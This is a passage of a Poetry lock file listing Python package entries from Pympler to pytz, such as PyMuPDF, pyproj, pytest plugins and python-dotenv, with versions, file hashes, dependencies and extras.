python-versions = ">=3.6" files = [ {file = "Pympler-1.0.1-py3-none-any.whl", hash = "sha256:d260dda9ae781e1eab6ea15bacb84015849833ba5555f141d2d9b7b7473b307d"}, {file = "Pympler-1.0.1.tar.gz", hash = "sha256:993f1a3599ca3f4fcd7160c7545ad06310c9e12f70174ae7ae8d4e25f6c5d3fa"}, ] [[package]] name = "pymupdf" version = "1.23.5" description = "A high performance Python library for data extraction, analysis, conversion & manipulation of PDF (and other) documents." 
optional = true python-versions = ">=3.8" files = [ {file = "PyMuPDF-1.23.5-cp310-none-macosx_10_9_x86_64.whl", hash = "sha256:c71b5e80a08272b9f3012314dc47ee2423270b30262d07ec7dd9709ae2bde1ac"}, {file = "PyMuPDF-1.23.5-cp310-none-macosx_11_0_arm64.whl", hash = "sha256:4b1bd9a91dee18bc95d7af2c593a214857a03e4fcd9a1eb01588df432de24c58"}, {file = "PyMuPDF-1.23.5-cp310-none-manylinux2014_aarch64.whl", hash = "sha256:eafa1bce0860320ddbb7edb4ab5678e02051db5450251ba8e918713d9a70c03c"}, {file = "PyMuPDF-1.23.5-cp310-none-manylinux2014_x86_64.whl", hash = "sha256:29e1d82b16f7580280ae35a0ae78de55f15c92ec87b7f3a1372f40f37a053bf3"}, {file = "PyMuPDF-1.23.5-cp310-none-win32.whl", hash = "sha256:d3bef175707693a2f53fe0fe4e546e3187c7876aedabfe43d9a916060bac9073"}, {file = "PyMuPDF-1.23.5-cp310-none-win_amd64.whl", hash = "sha256:da1b08b5348152f2940fa183d0265a6b6eb6f0292fae44b576eaf8e53723e336"}, {file = "PyMuPDF-1.23.5-cp311-none-macosx_10_9_x86_64.whl", hash = "sha256:59755a600c25a282589b548ffa045aed59c2df7b76943978cabb1825f0c03ec4"}, {file = "PyMuPDF-1.23.5-cp311-none-macosx_11_0_arm64.whl", hash = "sha256:264d5f6478d787c336520cf1a99e39bb6a0ef6d984550f925095c0e692dea7b5"}, {file = "PyMuPDF-1.23.5-cp311-none-manylinux2014_aarch64.whl", hash = "sha256:3f5fc705e8790217d23ab5e7ac2c05d82e050f6271b710300288adfe87a71072"}, {file = "PyMuPDF-1.23.5-cp311-none-manylinux2014_x86_64.whl", hash = "sha256:ee9e9ce1897eeac0fc33cf99084067c14250312a5dbc1372012c3d2f0e7a4af5"}, {file = "PyMuPDF-1.23.5-cp311-none-win32.whl", hash = "sha256:d2e9cfa46193fab196c27cb07561e1bb0938450984c2f01b3739f254a31b639e"}, {file = "PyMuPDF-1.23.5-cp311-none-win_amd64.whl", hash = "sha256:31405311c28fc8b3b2975a98b60bac388563748beaacb6da470f917678417e2d"}, {file = "PyMuPDF-1.23.5-cp312-none-macosx_10_9_x86_64.whl", hash = "sha256:64ab1097e3a077ae9db6a98d01e2e77087894ebd85b702edf5eb85d05ab8c0f1"}, {file = "PyMuPDF-1.23.5-cp312-none-macosx_11_0_arm64.whl", hash = "sha256:f7a8f91681b88ad216c36911e08ea25d2b3121350d52f4f8d76aeb0b7fcc6bef"}, {file = "PyMuPDF-1.23.5-cp312-none-manylinux2014_aarch64.whl", hash = "sha256:bb345ef1120db4f78ec0f229514d333ea3e7d367875c1400423a9b3e2b48ffc0"}, {file = "PyMuPDF-1.23.5-cp312-none-manylinux2014_x86_64.whl", hash = "sha256:9bde3683e254661e6b0032006f0ef7025ade2a33d3e3045499e71b76ea99942c"}, {file = "PyMuPDF-1.23.5-cp312-none-win32.whl", hash = "sha256:3a01c93c69e74068c1618631a750677fd088708d2b09b3c23809b099fa4ffa39"}, {file = "PyMuPDF-1.23.5-cp312-none-win_amd64.whl", hash = "sha256:693979ad4c8885729ac126b3202f1cb645f3392ad7e0964c2d924e61bc0e0a9d"}, {file = "PyMuPDF-1.23.5-cp38-none-macosx_10_9_x86_64.whl", hash = "sha256:9586bc98a322e546cf2e477309806aa4a3e1d18efc9b93fc2e2b3d8131e1b9f7"}, {file = "PyMuPDF-1.23.5-cp38-none-macosx_11_0_arm64.whl", hash = "sha256:faebdf8679706964f87617ee43b8d0107587d20b526892b538222146a4c32d43"}, {file = "PyMuPDF-1.23.5-cp38-none-manylinux2014_aarch64.whl", hash = "sha256:3400b582be3d71f1c0974701fcfda32f0c2ebb75a78c2aea430552b0c6896546"}, {file = "PyMuPDF-1.23.5-cp38-none-manylinux2014_x86_64.whl", hash = "sha256:fab599d23fa490725e5b5a70bfb6bc87acf5ceb70abe11ad2ef2b2f516961f31"}, {file = "PyMuPDF-1.23.5-cp38-none-win32.whl", hash = "sha256:53278c6a3d0a5dc8f221e0a77c065a61fd0598f9d8d9ef5be53de0c0a7d2df90"}, {file = "PyMuPDF-1.23.5-cp38-none-win_amd64.whl", hash = "sha256:dbce86df507f6bce118b12b33d893f1d3512013c898174211e903da78e1916aa"}, {file = "PyMuPDF-1.23.5-cp39-none-macosx_10_9_x86_64.whl", hash = "sha256:b234805b615b2d45dcb1bfe5c2167dc4121e31d618ab557856a3153b94c1676b"}, {file 
= "PyMuPDF-1.23.5-cp39-none-macosx_11_0_arm64.whl", hash = "sha256:4a53b2bf19be687160e4d18c27680e5326687aa39a7e31641d32a61edadbbfd9"}, {file = "PyMuPDF-1.23.5-cp39-none-manylinux2014_aarch64.whl", hash = "sha256:705a7aed0a917c35bb5efa4d94a7e8092705b3395726f9770d2b888de775f437"}, {file = "PyMuPDF-1.23.5-cp39-none-manylinux2014_x86_64.whl", hash = "sha256:332c1d5633c233458c4b65e6ad4a860391c507384bd2324a186b2702f8c64dfe"}, {file = "PyMuPDF-1.23.5-cp39-none-win32.whl", hash = "sha256:435a108cf8b53302500b52adb2cccbf2afa51c94ab3c705b250245090b46f5da"}, {file = "PyMuPDF-1.23.5-cp39-none-win_amd64.whl", hash = "sha256:460b47a1a17335d444ec441b68c083da5e51cdfcfa67a6638de69fe5e97f4ad2"}, {file = "PyMuPDF-1.23.5.tar.gz", hash = "sha256:4508ee04c46cac8356a9d04f0d9a63f845770d2abb54caf512b44d22f0e80300"}, ] [package.dependencies] PyMuPDFb = "1.23.5" [[package]] name = "pymupdfb" version = "1.23.5" description = "MuPDF shared libraries for PyMuPDF." optional = true python-versions = ">=3.8" files = [ {file = "PyMuPDFb-1.23.5-py3-none-macosx_10_9_x86_64.whl", hash = "sha256:d0095f28b2bcd64ed8a9636dfba193108eeb6c24d0ec71fa3f88cb15aee67a30"}, {file = "PyMuPDFb-1.23.5-py3-none-macosx_11_0_arm64.whl", hash = "sha256:80137c37a4b0d5abeb988434c7d7eb3f9087afdd0754f4bf2f8840a788e691ae"}, {file = "PyMuPDFb-1.23.5-py3-none-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:e26705e1a4ea42926b70c5655f2509d555a4774d1d1382ecc7e76466695209e6"}, {file = "PyMuPDFb-1.23.5-py3-none-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:2b71b5b7987f2ebe9f6893544151ede2de74ec30651eef584039eb5f9c7c02aa"}, {file = "PyMuPDFb-1.23.5-py3-none-win32.whl", hash = "sha256:f269814bafdffd5558d44af3de63eaa531d498de640a79cf6c7072011fd4088f"}, {file = "PyMuPDFb-1.23.5-py3-none-win_amd64.whl", hash = "sha256:85cbc308085a4ec794e0da790965985cc5ccb21b2abc09732e072f6eaf10150b"}, ] [[package]] name = "pyowm" version = "3.3.0" description = "A Python wrapper around OpenWeatherMap web APIs" optional = true python-versions = ">=3.7" files = [ {file = "pyowm-3.3.0-py3-none-any.whl", hash = "sha256:86463108e7613171531ba306040b43c972b3fc0b0acf73b12c50910cdd2107ab"}, {file = "pyowm-3.3.0.tar.gz", hash = "sha256:8196f77c91eac680676ed5ee484aae8a165408055e3e2b28025cbf60b8681e03"}, ] [package.dependencies] geojson = ">=2.3.0,<3" PySocks = ">=1.7.1,<2" requests = [ {version = ">=2.20.0,<3"}, {version = "*", extras = ["socks"]}, ] [[package]] name = "pyparsing" version = "3.1.1" description = "pyparsing module - Classes and methods to define and execute parsing grammars" optional = true python-versions = ">=3.6.8" files = [ {file = "pyparsing-3.1.1-py3-none-any.whl", hash = "sha256:32c7c0b711493c72ff18a981d24f28aaf9c1fb7ed5e9667c9e84e3db623bdbfb"}, {file = "pyparsing-3.1.1.tar.gz", hash = "sha256:ede28a1a32462f5a9705e07aea48001a08f7cf81a021585011deba701581a0db"}, ] [package.extras] diagrams = ["jinja2", "railroad-diagrams"] [[package]] name = "pypdf" version = "3.16.4" description = "A pure-python PDF library capable of splitting, merging, cropping, and transforming PDF files" optional = true python-versions = ">=3.6" files = [ {file = "pypdf-3.16.4-py3-none-any.whl", hash = "sha256:a9b1eaf2db4c2edd93093470d33c3f353235c4a694f8a426a92a8ce77cea9eb7"}, {file = "pypdf-3.16.4.tar.gz", hash = "sha256:01927771b562d4ba84939ef95b393f0179166da786c5db710d07f807c52f480d"}, ] [package.dependencies] typing_extensions = {version = ">=3.7.4.3", markers = "python_version < \"3.10\""} [package.extras] crypto = ["PyCryptodome", "cryptography"] dev = 
["black", "flit", "pip-tools", "pre-commit (<2.18.0)", "pytest-cov", "pytest-socket", "pytest-timeout", "wheel"] docs = ["myst_parser", "sphinx", "sphinx_rtd_theme"] full = ["Pillow (>=8.0.0)", "PyCryptodome", "cryptography"] image = ["Pillow (>=8.0.0)"] [[package]] name = "pypdfium2" version = "4.22.0" description = "Python bindings to PDFium" optional = true python-versions = ">= 3.6" files = [ {file = "pypdfium2-4.22.0-py3-none-macosx_10_13_x86_64.whl", hash = "sha256:398e4173b9bd2b9cce509b2ed655bbf2bf7b76f408ecf6c099e189996a28bbae"}, {file = "pypdfium2-4.22.0-py3-none-macosx_11_0_arm64.whl", hash = "sha256:9aa3f3357014c1a9e1a45706eca4c214b79b9253447605992c1ede4422e343d9"}, {file = "pypdfium2-4.22.0-py3-none-manylinux_2_17_aarch64.whl", hash = "sha256:5335b128fa7764655e8d9f7349fe8c48293a3f61b4272709e15327a85b72ee90"}, {file = "pypdfium2-4.22.0-py3-none-manylinux_2_17_armv7l.whl", hash = "sha256:5e039a2d6283a5cae7b2b8c1454b7bec08025515b640e2ffd99452d4a85e73f9"}, {file = "pypdfium2-4.22.0-py3-none-manylinux_2_17_i686.whl", hash = "sha256:5d618ba82bbad8ca8a93a0e3dc6d1a5f1d0698a34049de85dd51a4b6b398e696"}, {file = "pypdfium2-4.22.0-py3-none-manylinux_2_17_x86_64.whl", hash = "sha256:5e928c6b37315ef686d3e427f9b30b2f58f1e98bb0622471874c1dde39337f03"}, {file = "pypdfium2-4.22.0-py3-none-musllinux_1_1_aarch64.whl", hash = "sha256:a8afd323889edbdc864881dba833f96c550a0be78a0ddd35040e10adfbce0aa2"}, {file = "pypdfium2-4.22.0-py3-none-musllinux_1_1_i686.whl", hash = "sha256:f6bcedc51327d335ed471f5b8c27a6d6bfad20249f3d79bc79bfe469d93fbe7a"}, {file = "pypdfium2-4.22.0-py3-none-musllinux_1_1_x86_64.whl", hash = "sha256:9101be6fd7f749ab8def0bc5b93f93ec4c45ce0634b9ddcf2cc921d8e08bb763"}, {file = "pypdfium2-4.22.0-py3-none-win32.whl", hash = "sha256:3970154748fc0ee48bb22ffc15a5d66054b6ca553180bb84d743ee8192413549"}, {file = "pypdfium2-4.22.0-py3-none-win_amd64.whl", hash = "sha256:02399c25c1f3d30fa80de616dffc0becd885f4b8a03e7dfae3afb553b49644e3"}, {file = "pypdfium2-4.22.0-py3-none-win_arm64.whl", hash = "sha256:caddf0de2d25e0572a3ddbb7b6c6d60ad9c68290fab593e7a2609f06a88d6fdf"}, {file = "pypdfium2-4.22.0.tar.gz", hash = "sha256:c29d09b59ed65c5f27d81af9c985c89da7b10c0ac3775dfb2474a94a6d6dc850"}, ] [[package]] name = "pyphen" version = "0.14.0" description = "Pure Python module to hyphenate text" optional = true python-versions = ">=3.7" files = [ {file = "pyphen-0.14.0-py3-none-any.whl", hash = "sha256:414c9355958ca3c6a3ff233f65678c245b8ecb56418fb291e2b93499d61cd510"}, {file = "pyphen-0.14.0.tar.gz", hash = "sha256:596c8b3be1c1a70411ba5f6517d9ccfe3083c758ae2b94a45f2707346d8e66fa"}, ] [package.extras] doc = ["sphinx", "sphinx_rtd_theme"] test = ["flake8", "isort", "pytest"] [[package]] name = "pyproj" version = "3.5.0" description = "Python interface to PROJ (cartographic projections and coordinate transformations library)" optional = true python-versions = ">=3.8" files = [ {file = "pyproj-3.5.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:6475ce653880938468a1a1b7321267243909e34b972ba9e53d5982c41d555918"}, {file = "pyproj-3.5.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:61e4ad57d89b03a7b173793b31bca8ee110112cde1937ef0f42a70b9120c827d"}, {file = "pyproj-3.5.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:7bdd2021bb6f7f346bfe1d2a358aa109da017d22c4704af2d994e7c7ee0a7a53"}, {file = "pyproj-3.5.0-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5674923351e76222e2c10c58b5e1ac119d7a46b270d822c463035971b06f724b"}, {file = 
"pyproj-3.5.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cd5e2b6aa255023c4acd0b977590f1f7cc801ba21b4d806fcf6dfac3474ebb83"}, {file = "pyproj-3.5.0-cp310-cp310-win32.whl", hash = "sha256:6f316a66031a14e9c5a88c91f8b77aa97f5454895674541ed6ab630b682be35d"}, {file = "pyproj-3.5.0-cp310-cp310-win_amd64.whl", hash = "sha256:f7c2f4d9681e810cf40239caaca00079930a6d9ee6591139b88d592d36051d82"}, {file = "pyproj-3.5.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:7572983134e310e0ca809c63f1722557a040fe9443df5f247bf11ba887eb1229"}, {file = "pyproj-3.5.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:eccb417b91d0be27805dfc97550bfb8b7db94e9fe1db5ebedb98f5b88d601323"}, {file = "pyproj-3.5.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:621d78a9d8bf4d06e08bef2471021fbcb1a65aa629ad4a20c22e521ce729cc20"}, {file = "pyproj-3.5.0-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d9a024370e917c899bff9171f03ea6079deecdc7482a146a2c565f3b9df134ea"}, {file = "pyproj-3.5.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1b7c2113c4d11184a238077ec85e31eda1dcc58ffeb9a4429830e0a7036e787d"}, {file = "pyproj-3.5.0-cp311-cp311-win32.whl", hash = "sha256:a730f5b4c98c8a0f312437873e6e34dbd4cc6dc23d5afd91a6691c62724b1f68"}, {file = "pyproj-3.5.0-cp311-cp311-win_amd64.whl", hash = "sha256:e97573de0ab3bbbcb4c7748bc41f4ceb6da10b45d35b1a294b5820701e7c25f0"}, {file = "pyproj-3.5.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:2b708fd43453b985642b737d4a6e7f1d6a0ab1677ffa4e14cc258537b49224b0"}, {file = "pyproj-3.5.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:b60d93a200639e8367c6542a964fd0aa2dbd152f256c1831dc18cd5aa470fb8a"}, {file = "pyproj-3.5.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:38862fe07316ae12b79d82d298e390973a4f00b684f3c2d037238e20e00610ba"}, {file = "pyproj-3.5.0-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:71b65f2a38cd9e16883dbb0f8ae82bdf8f6b79b1b02975c78483ab8428dbbf2f"}, {file = "pyproj-3.5.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b752b7d9c4b08181c7e8c0d9c7f277cbefff42227f34d3310696a87c863d9dd3"}, {file = "pyproj-3.5.0-cp38-cp38-win32.whl", hash = "sha256:b937215bfbaf404ec8f03ca741fc3f9f2c4c2c5590a02ccddddd820ae3c71331"}, {file = "pyproj-3.5.0-cp38-cp38-win_amd64.whl", hash = "sha256:97ed199033c2c770e7eea2ef80ff5e6413426ec2d7ec985b869792f04ab95d05"}, {file = "pyproj-3.5.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:052c49fce8b5d55943a35c36ccecb87350c68b48ba95bc02a789770c374ef819"}, {file = "pyproj-3.5.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:1507138ea28bf2134d31797675380791cc1a7156a3aeda484e65a78a4aba9b62"}, {file = "pyproj-3.5.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c02742ef3d846401861a878a61ef7ad911ea7539d6cc4619ddb52dbdf7b45aee"}, {file = "pyproj-3.5.0-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:385b0341861d3ebc8cad98337a738821dcb548d465576527399f4955ca24b6ed"}, {file = "pyproj-3.5.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8fe6bb1b68a35d07378d38be77b5b2f8dd2bea5910c957bfcc7bee55988d3910"}, {file = "pyproj-3.5.0-cp39-cp39-win32.whl", hash = "sha256:5c4b85ac10d733c42d73a2e6261c8d6745bf52433a31848dd1b6561c9a382da3"}, {file = "pyproj-3.5.0-cp39-cp39-win_amd64.whl", hash = "sha256:1798ff7d65d9057ebb2d017ffe8403268b8452f24d0428b2140018c25c7fa1bc"}, {file = 
"pyproj-3.5.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:d711517a8487ef3245b08dc82f781a906df9abb3b6cb0ce0486f0eeb823ca570"}, {file = "pyproj-3.5.0-pp38-pypy38_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:788a5dadb532644a64efe0f5f01bf508c821eb7e984f13a677d56002f1e8a67a"}, {file = "pyproj-3.5.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:73f7960a97225812f9b1d7aeda5fb83812f38de9441e3476fcc8abb3e2b2f4de"}, {file = "pyproj-3.5.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:fde5ece4d2436b5a57c8f5f97b49b5de06a856d03959f836c957d3e609f2de7e"}, {file = "pyproj-3.5.0-pp39-pypy39_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e08db25b61cf024648d55973cc3d1c3f1d0818fabf594d5f5a8e2318103d2aa0"}, {file = "pyproj-3.5.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6a87b419a2a352413fbf759ecb66da9da50bd19861c8f26db6a25439125b27b9"}, {file = "pyproj-3.5.0.tar.gz", hash = "sha256:9859d1591c1863414d875ae0759e72c2cffc01ab989dc64137fbac572cc81bf6"}, ] [package.dependencies] certifi = "*" [[package]] name = "pyproject-hooks" version = "1.0.0" description = "Wrappers to call pyproject.toml-based build backend hooks." optional = true python-versions = ">=3.7" files = [ {file = "pyproject_hooks-1.0.0-py3-none-any.whl", hash = "sha256:283c11acd6b928d2f6a7c73fa0d01cb2bdc5f07c57a2eeb6e83d5e56b97976f8"}, {file = "pyproject_hooks-1.0.0.tar.gz", hash = "sha256:f271b298b97f5955d53fb12b72c1fb1948c22c1a6b70b315c54cedaca0264ef5"}, ] [package.dependencies] tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""} [[package]] name = "pyre-extensions" version = "0.0.23" description = "Type system extensions for use with the pyre type checker" optional = true python-versions = "*" files = [ {file = "pyre-extensions-0.0.23.tar.gz", hash = "sha256:df019263900af45e83e41fb9e889824e8b7bcdb9cb67fe2957bb80104eadcbc7"}, {file = "pyre_extensions-0.0.23-py3-none-any.whl", hash = "sha256:e945fdf4113172cec517c5daeca56f61f6632fd5b8d8165f1253c8865c87e62b"}, ] [package.dependencies] typing-extensions = "*" typing-inspect = "*" [[package]] name = "pyreadline3" version = "3.4.1" description = "A python implementation of GNU readline." optional = true python-versions = "*" files = [ {file = "pyreadline3-3.4.1-py3-none-any.whl", hash = "sha256:b0efb6516fd4fb07b45949053826a62fa4cb353db5be2bbb4a7aa1fdd1e345fb"}, {file = "pyreadline3-3.4.1.tar.gz", hash = "sha256:6f3d1f7b8a31ba32b73917cefc1f28cc660562f39aea8646d30bd6eff21f7bae"}, ] [[package]] name = "pysocks" version = "1.7.1" description = "A Python SOCKS client module. See https://github.com/Anorov/PySocks for more information." 
optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" files = [ {file = "PySocks-1.7.1-py27-none-any.whl", hash = "sha256:08e69f092cc6dbe92a0fdd16eeb9b9ffbc13cadfe5ca4c7bd92ffb078b293299"}, {file = "PySocks-1.7.1-py3-none-any.whl", hash = "sha256:2725bd0a9925919b9b51739eea5f9e2bae91e83288108a9ad338b2e3a4435ee5"}, {file = "PySocks-1.7.1.tar.gz", hash = "sha256:3f8804571ebe159c380ac6de37643bb4685970655d3bba243530d6558b799aa0"}, ] [[package]] name = "pyspark" version = "3.5.0" description = "Apache Spark Python API" optional = true python-versions = ">=3.8" files = [ {file = "pyspark-3.5.0.tar.gz", hash = "sha256:d41a9b76bd2aca370a6100d075c029e22ba44c5940927877e9435a3a9c566558"}, ] [package.dependencies] py4j = "0.10.9.7" [package.extras] connect = ["googleapis-common-protos (>=1.56.4)", "grpcio (>=1.56.0)", "grpcio-status (>=1.56.0)", "numpy (>=1.15)", "pandas (>=1.0.5)", "pyarrow (>=4.0.0)"] ml = ["numpy (>=1.15)"] mllib = ["numpy (>=1.15)"] pandas-on-spark = ["numpy (>=1.15)", "pandas (>=1.0.5)", "pyarrow (>=4.0.0)"] sql = ["numpy (>=1.15)", "pandas (>=1.0.5)", "pyarrow (>=4.0.0)"] [[package]] name = "pytesseract" version = "0.3.10" description = "Python-tesseract is a python wrapper for Google's Tesseract-OCR" optional = true python-versions = ">=3.7" files = [ {file = "pytesseract-0.3.10-py3-none-any.whl", hash = "sha256:8f22cc98f765bf13517ead0c70effedb46c153540d25783e04014f28b55a5fc6"}, {file = "pytesseract-0.3.10.tar.gz", hash = "sha256:f1c3a8b0f07fd01a1085d451f5b8315be6eec1d5577a6796d46dc7a62bd4120f"}, ] [package.dependencies] packaging = ">=21.3" Pillow = ">=8.0.0" [[package]] name = "pytest" version = "7.4.3" description = "pytest: simple powerful testing with Python" optional = false python-versions = ">=3.7" files = [ {file = "pytest-7.4.3-py3-none-any.whl", hash = "sha256:0d009c083ea859a71b76adf7c1d502e4bc170b80a8ef002da5806527b9591fac"}, {file = "pytest-7.4.3.tar.gz", hash = "sha256:d989d136982de4e3b29dabcc838ad581c64e8ed52c11fbe86ddebd9da0818cd5"}, ] [package.dependencies] colorama = {version = "*", markers = "sys_platform == \"win32\""} exceptiongroup = {version = ">=1.0.0rc8", markers = "python_version < \"3.11\""} iniconfig = "*" packaging = "*" pluggy = ">=0.12,<2.0" tomli = {version = ">=1.0.0", markers = "python_version < \"3.11\""} [package.extras] testing = ["argcomplete", "attrs (>=19.2.0)", "hypothesis (>=3.56)", "mock", "nose", "pygments (>=2.7.2)", "requests", "setuptools", "xmlschema"] [[package]] name = "pytest-asyncio" version = "0.20.3" description = "Pytest support for asyncio" optional = false python-versions = ">=3.7" files = [ {file = "pytest-asyncio-0.20.3.tar.gz", hash = "sha256:83cbf01169ce3e8eb71c6c278ccb0574d1a7a3bb8eaaf5e50e0ad342afb33b36"}, {file = "pytest_asyncio-0.20.3-py3-none-any.whl", hash = "sha256:f129998b209d04fcc65c96fc85c11e5316738358909a8399e93be553d7656442"}, ] [package.dependencies] pytest = ">=6.1.0" [package.extras] docs = ["sphinx (>=5.3)", "sphinx-rtd-theme (>=1.0)"] testing = ["coverage (>=6.2)", "flaky (>=3.5.0)", "hypothesis (>=5.7.1)", "mypy (>=0.931)", "pytest-trio (>=0.7.0)"] [[package]] name = "pytest-cov" version = "4.1.0" description = "Pytest plugin for measuring coverage." 
optional = false python-versions = ">=3.7" files = [ {file = "pytest-cov-4.1.0.tar.gz", hash = "sha256:3904b13dfbfec47f003b8e77fd5b589cd11904a21ddf1ab38a64f204d6a10ef6"}, {file = "pytest_cov-4.1.0-py3-none-any.whl", hash = "sha256:6ba70b9e97e69fcc3fb45bfeab2d0a138fb65c4d0d6a41ef33983ad114be8c3a"}, ] [package.dependencies] coverage = {version = ">=5.2.1", extras = ["toml"]} pytest = ">=4.6" [package.extras] testing = ["fields", "hunter", "process-tests", "pytest-xdist", "six", "virtualenv"] [[package]] name = "pytest-dotenv" version = "0.5.2" description = "A py.test plugin that parses environment files before running tests" optional = false python-versions = "*" files = [ {file = "pytest-dotenv-0.5.2.tar.gz", hash = "sha256:2dc6c3ac6d8764c71c6d2804e902d0ff810fa19692e95fe138aefc9b1aa73732"}, {file = "pytest_dotenv-0.5.2-py3-none-any.whl", hash = "sha256:40a2cece120a213898afaa5407673f6bd924b1fa7eafce6bda0e8abffe2f710f"}, ] [package.dependencies] pytest = ">=5.0.0" python-dotenv = ">=0.9.1" [[package]] name = "pytest-mock" version = "3.12.0" description = "Thin-wrapper around the mock package for easier use with pytest" optional = false python-versions = ">=3.8" files = [ {file = "pytest-mock-3.12.0.tar.gz", hash = "sha256:31a40f038c22cad32287bb43932054451ff5583ff094bca6f675df2f8bc1a6e9"}, {file = "pytest_mock-3.12.0-py3-none-any.whl", hash = "sha256:0972719a7263072da3a21c7f4773069bcc7486027d7e8e1f81d98a47e701bc4f"}, ] [package.dependencies] pytest = ">=5.0" [package.extras] dev = ["pre-commit", "pytest-asyncio", "tox"] [[package]] name = "pytest-socket" version = "0.6.0" description = "Pytest Plugin to disable socket calls during tests" optional = false python-versions = ">=3.7,<4.0" files = [ {file = "pytest_socket-0.6.0-py3-none-any.whl", hash = "sha256:cca72f134ff01e0023c402e78d31b32e68da3efdf3493bf7788f8eba86a6824c"}, {file = "pytest_socket-0.6.0.tar.gz", hash = "sha256:363c1d67228315d4fc7912f1aabfd570de29d0e3db6217d61db5728adacd7138"}, ] [package.dependencies] pytest = ">=3.6.3" [[package]] name = "pytest-vcr" version = "1.0.2" description = "Plugin for managing VCR.py cassettes" optional = false python-versions = "*" files = [ {file = "pytest-vcr-1.0.2.tar.gz", hash = "sha256:23ee51b75abbcc43d926272773aae4f39f93aceb75ed56852d0bf618f92e1896"}, {file = "pytest_vcr-1.0.2-py2.py3-none-any.whl", hash = "sha256:2f316e0539399bea0296e8b8401145c62b6f85e9066af7e57b6151481b0d6d9c"}, ] [package.dependencies] pytest = ">=3.6.0" vcrpy = "*" [[package]] name = "pytest-watcher" version = "0.2.6" description = "Continiously runs pytest on changes in *.py files" optional = false python-versions = ">=3.7.0,<4.0.0" files = [ {file = "pytest-watcher-0.2.6.tar.gz", hash = "sha256:351dfb3477366030ff275bfbfc9f29bee35cd07f16a3355b38bf92766886bae4"}, {file = "pytest_watcher-0.2.6-py3-none-any.whl", hash = "sha256:0a507159d051c9461790363e0f9b2827c1d82ad2ae8966319598695e485b1dd5"}, ] [package.dependencies] watchdog = ">=2.0.0" [[package]] name = "python-arango" version = "7.7.0" description = "Python Driver for ArangoDB" optional = true python-versions = ">=3.8" files = [ {file = "python-arango-7.7.0.tar.gz", hash = "sha256:0260ae03c99f5cd786a5c9ba36601c41491566f6e92bbc6b59bf5d91712dd2ce"}, {file = "python_arango-7.7.0-py3-none-any.whl", hash = "sha256:c6e2c6147ba7ed53c9f3a92494b980ad5a4a986b6f11c2e11d5bd183f18d4c5c"}, ] [package.dependencies] importlib-metadata = ">=4.7.1" packaging = ">=23.1" PyJWT = "*" requests = "*" requests-toolbelt = "*" setuptools = ">=42" urllib3 = ">=1.26.0" [package.extras] dev = 
["black (>=22.3.0)", "flake8 (>=4.0.1)", "isort (>=5.10.1)", "mock", "mypy (>=0.942)", "pre-commit (>=2.17.0)", "pytest (>=7.1.1)", "pytest-cov (>=3.0.0)", "sphinx", "sphinx-rtd-theme", "types-pkg-resources", "types-requests", "types-setuptools"] [[package]] name = "python-dateutil" version = "2.8.2" description = "Extensions to the standard Python datetime module" optional = false python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7" files = [ {file = "python-dateutil-2.8.2.tar.gz", hash = "sha256:0123cacc1627ae19ddf3c27a5de5bd67ee4586fbdd6440d9748f8abb483d3e86"}, {file = "python_dateutil-2.8.2-py2.py3-none-any.whl", hash = "sha256:961d03dc3453ebbc59dbdea9e4e11c5651520a876d0f4db161e8674aae935da9"}, ] [package.dependencies] six = ">=1.5" [[package]] name = "python-dotenv" version = "1.0.0" description = "Read key-value pairs from a .env file and set them as environment variables" optional = false python-versions = ">=3.8" files = [ {file = "python-dotenv-1.0.0.tar.gz", hash = "sha256:a8df96034aae6d2d50a4ebe8216326c61c3eb64836776504fcca410e5937a3ba"}, {file = "python_dotenv-1.0.0-py3-none-any.whl", hash = "sha256:f5971a9226b701070a4bf2c38c89e5a3f0d64de8debda981d1db98583009122a"}, ] [package.extras] cli = ["click (>=5.0)"] [[package]] name = "python-json-logger" version = "2.0.7" description = "A python library adding a json log formatter" optional = false python-versions = ">=3.6" files = [ {file = "python-json-logger-2.0.7.tar.gz", hash = "sha256:23e7ec02d34237c5aa1e29a070193a4ea87583bb4e7f8fd06d3de8264c4b2e1c"}, {file = "python_json_logger-2.0.7-py3-none-any.whl", hash = "sha256:f380b826a991ebbe3de4d897aeec42760035ac760345e57b812938dc8b35e2bd"}, ] [[package]] name = "pytz" version = "2023.3.post1" description = "World timezone definitions, modern and historical" optional = false python-versions = "*" files = [ 